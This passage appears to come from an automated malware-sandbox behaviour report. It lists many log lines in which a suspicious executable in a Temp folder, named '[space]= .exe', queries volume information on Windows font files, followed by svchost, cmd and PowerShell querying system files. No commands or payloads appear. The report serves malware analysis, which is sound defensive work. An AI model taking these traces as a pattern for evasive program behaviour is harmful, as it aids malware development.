Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
